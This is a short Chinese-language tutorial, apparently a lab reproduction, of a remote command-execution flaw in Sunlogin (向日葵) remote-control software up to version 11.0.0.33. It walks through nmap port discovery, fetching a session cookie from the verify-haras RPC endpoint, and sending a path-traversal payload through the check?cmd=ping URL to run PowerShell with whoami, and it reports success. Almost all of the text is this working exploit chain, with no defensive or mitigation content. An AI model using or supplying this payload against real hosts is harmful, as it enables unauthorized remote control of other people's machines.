命令执行漏洞详解 - 向日葵命令执行

1. 向日葵的版本是<=11.0.0.33版本的，

2. 打开向日葵，需要连接服务器成功

3. 打开之后会自动开启一个40000-60000之间随机的端口，此时使用kali的nmap进行探测

此时扫出来49408、49409、49410、49411、49413、49414、49415、49492这八个端口

4、探测向日葵的端口

在浏览器中访问目标的ip：以上端口，访问向日葵的端口时，会报出以下页面

此时确定端口为49492

5、获取cookie值

poc：

目标IP：端口/cgi-bin/rpc?action=verify-haras

成功获取cookie

6、拿到CID-添加payload和cookie-发送http://ip/check?cmd=ping…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2F…%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

实操成功